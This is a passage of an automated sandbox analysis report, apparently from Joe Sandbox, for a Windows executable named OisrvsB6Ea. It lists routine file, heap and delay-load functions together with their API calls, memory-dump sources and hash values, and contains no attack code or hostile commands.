                                                                                  • Instruction Fuzzy Hash: 38A011CA2BA0003C3808B2A02C03C3B020EC0C2F22332822EF800800C0AC8008300E30
                                                                                  Function 0028E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 8dd7071b102f980bebedf58975e01e4a02352b932d742926218560539855fe89
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 8dd7071b102f980bebedf58975e01e4a02352b932d742926218560539855fe89
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  Function 0028E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 2ed37d26a768ba4539a82cbd1de58fffc078691b6a147e9a983d19c1aa9c9cd9
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 2ed37d26a768ba4539a82cbd1de58fffc078691b6a147e9a983d19c1aa9c9cd9
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  Function 0028E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 88662b53125c86aa864e3fa9bc456bf6a6e871119e85ef7bb71cbbad1968e22f
                                                                                  • Instruction ID: 760f78669b28f3df8b41872cc45d8e9709894b0c2b1658c235231c2fb28d46c4
                                                                                  • Opcode Fuzzy Hash: 88662b53125c86aa864e3fa9bc456bf6a6e871119e85ef7bb71cbbad1968e22f
                                                                                  • Instruction Fuzzy Hash: 4DA011CA2BA002BC3808B2002C02C3F020EC0C3F203B2882EF802800C0AC800C200E30
                                                                                  Function 0028E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 8b101066ec94135dabe679650f717214a1b60713c9d38bcef4698b3f070187f0
                                                                                  • Instruction ID: 3af25683c650ac8db9185e8c1c48c9d65a048f0f0b9e855eebf3b4587bfd0c07
                                                                                  • Opcode Fuzzy Hash: 8b101066ec94135dabe679650f717214a1b60713c9d38bcef4698b3f070187f0
                                                                                  • Instruction Fuzzy Hash: 43A001DA6BE152BD3918B6A16D07C3B021EC4C6F65372992EF816854D1AC8418751E71
                                                                                  Function 0028E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: c6dc79af9edd073b194b75aa98dcdb025d43502545db96452db0bf8e397f59d8
                                                                                  • Instruction ID: 3af25683c650ac8db9185e8c1c48c9d65a048f0f0b9e855eebf3b4587bfd0c07
                                                                                  • Opcode Fuzzy Hash: c6dc79af9edd073b194b75aa98dcdb025d43502545db96452db0bf8e397f59d8
                                                                                  • Instruction Fuzzy Hash: 43A001DA6BE152BD3918B6A16D07C3B021EC4C6F65372992EF816854D1AC8418751E71
                                                                                  Function 0029BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0029B7BB: GetOEMCP.KERNEL32(00000000,?,?,0029BA44,?), ref: 0029B7E6
                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0029BA89,?,00000000), ref: 0029BC64
                                                                                  • GetCPInfo.KERNEL32(00000000,0029BA89,?,?,?,0029BA89,?,00000000), ref: 0029BC77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CodeInfoPageValid
                                                                                  • String ID:
                                                                                  • API String ID: 546120528-0
                                                                                  • Opcode ID: a4d39d4f28002f41ee4878eb8a996c0ebfa12247109f9a716c275b44e2920398
                                                                                  • Instruction ID: 5a01f2329573fde13348d599008aef565546028362a98ada7be7fef0b00ef9f7
                                                                                  • Opcode Fuzzy Hash: a4d39d4f28002f41ee4878eb8a996c0ebfa12247109f9a716c275b44e2920398
                                                                                  • Instruction Fuzzy Hash: 08517770D203069FDF26CF71EA856BBBBE4EF42300F14446ED4968B691DB349916CBA0
                                                                                  Function 00279A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00279A50,?,?,00000000,?,?,00278CBC,?), ref: 00279BAB
                                                                                  • GetLastError.KERNEL32(?,00000000,00278411,-00009570,00000000,000007F3), ref: 00279BB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 6fa09fcd2e9247fe0610b2eedfba034db2dcd1e93f24e1ba971d1c20b01ff58b
                                                                                  • Instruction ID: f54451033773fc4837682b37115d4ea6c7a75138b84545bf40169a46c594cd2d
                                                                                  • Opcode Fuzzy Hash: 6fa09fcd2e9247fe0610b2eedfba034db2dcd1e93f24e1ba971d1c20b01ff58b
                                                                                  • Instruction Fuzzy Hash: A041F231624302CFDB24DF19E58456AB7EAFFD5324F14DA2DE88983260D7B0ED948B51
                                                                                  Function 00271E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00271E55
                                                                                    • Part of subcall function 00273BBA: __EH_prolog.LIBCMT ref: 00273BBF
                                                                                  • _wcslen.LIBCMT ref: 00271EFD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2838827086-0
                                                                                  • Opcode ID: 05dee3f3475705b7c33fc8d90996ec7919edea36242ce6b1c2009a6d803141c0
                                                                                  • Instruction ID: 0082c6f0db388b301c30615780bcb3149883875f6ac1bde746e5be004b0b91b9
                                                                                  • Opcode Fuzzy Hash: 05dee3f3475705b7c33fc8d90996ec7919edea36242ce6b1c2009a6d803141c0
                                                                                  • Instruction Fuzzy Hash: F8314A719252099FCF15EF98C945AEEBBF9AF08304F104069E889B7291CB325E21CF61
                                                                                  Function 00279DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002773BC,?,?,?,00000000), ref: 00279DBC
                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 7a90088b0928f409338abeecd53eab76acd14dd629d79c2a0780f1724c72fd8e
                                                                                  • Instruction ID: 5fc1a2ca86389fa699d515f300e54d61471aa0e6dc67fe1d98028bc9a2f0dc6b
                                                                                  • Opcode Fuzzy Hash: 7a90088b0928f409338abeecd53eab76acd14dd629d79c2a0780f1724c72fd8e
                                                                                  • Instruction Fuzzy Hash: 132126312693469FC724EF34C491AABBBE8AF52304F08885DF8C983181D338D96DCB61
                                                                                  Function 0027966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00279F27,?,?,0027771A), ref: 002796E6
                                                                                  • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00279F27,?,?,0027771A), ref: 00279716
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5b61245040cf8c11b51d79f9cebd7905fe73b49f9c9907e77f2b2cdf6a19aa13
                                                                                  • Instruction ID: 6680d2664aa145a4b82103637fa4a7283843134eb089436799e08cb62889cd1d
                                                                                  • Opcode Fuzzy Hash: 5b61245040cf8c11b51d79f9cebd7905fe73b49f9c9907e77f2b2cdf6a19aa13
                                                                                  • Instruction Fuzzy Hash: D621CFB1520345AFE3309E65CC89FB7B7DCEB49324F108B19FA99C21D1C7B4A8948A31
                                                                                  Function 00279E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00279EC7
                                                                                  • GetLastError.KERNEL32 ref: 00279ED4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 90290269ad923e2c1be1b5453f6c3a7cb0e49c5970f0a22f937ae82d25fa9d6e
                                                                                  • Instruction ID: ff00719ce1f9e0731cf5e075a94c28a94dc253e372896d97988edd12d551f0db
                                                                                  • Opcode Fuzzy Hash: 90290269ad923e2c1be1b5453f6c3a7cb0e49c5970f0a22f937ae82d25fa9d6e
                                                                                  • Instruction Fuzzy Hash: F7114C306207019BD734CA28CC44BB6B3E9EB05370F608A2AE557D26D0D7B0EDA5C760
                                                                                  Function 00298E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00298E75
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,002B1098,002717CE,?,?,00000007,?,?,?,002713D6,?,00000000), ref: 00298EB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocAllocate_free
                                                                                  • String ID:
                                                                                  • API String ID: 2447670028-0
                                                                                  • Opcode ID: 60722a857d4f7b25129d60a38d79bd006793e0377b7fb106b7364b1636f477f8
                                                                                  • Instruction ID: 4402b9aadf25a57f761b9008f16d5ceee21df3376d12ed6cf6c8c7c83eaa0111
                                                                                  • Opcode Fuzzy Hash: 60722a857d4f7b25129d60a38d79bd006793e0377b7fb106b7364b1636f477f8
                                                                                  • Instruction Fuzzy Hash: 9FF0F632A3120366DF216E25AC15B6F37589F83B70F2C412AF998A7191DF71CD2085A0
                                                                                  Function 0028109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?), ref: 002810AB
                                                                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 002810B2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$AffinityCurrentMask
                                                                                  • String ID:
                                                                                  • API String ID: 1231390398-0
                                                                                  • Opcode ID: a7f3b8e6831bffe3888e72c60a1447868059937351d23f99c84fcfed23b8847d
                                                                                  • Instruction ID: 13b5a3cb425dc48f9dae4a0959621ee1ee9d71254ec2617c4537a10f667baf94
                                                                                  • Opcode Fuzzy Hash: a7f3b8e6831bffe3888e72c60a1447868059937351d23f99c84fcfed23b8847d
                                                                                  • Instruction Fuzzy Hash: F6E0D836B21146A7DF09DBB49C099EB73DDEA452043104175E803D3281F930EE564760
                                                                                  Function 0027A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2673547680-0
                                                                                  • Opcode ID: 7bd1153ca265511761cbf26f717eb11f84c4b9686ac51469e9fd9857300447e8
                                                                                  • Instruction ID: 6632543b747fb1a69364abbdad354207ef8f31684c59c3f87312987ce94cad3a
                                                                                  • Opcode Fuzzy Hash: 7bd1153ca265511761cbf26f717eb11f84c4b9686ac51469e9fd9857300447e8
                                                                                  • Instruction Fuzzy Hash: C7F0303265110ABBDF015F60DC45FDE376CBB05389F44C051BD49D5160DB71DAA8DB50
                                                                                  Function 0027A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(000000FF,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641,000000FF), ref: 0027A1F1
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0027977F,?,?,002795CF,?,?,?,?,?,002A2641), ref: 0027A21F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
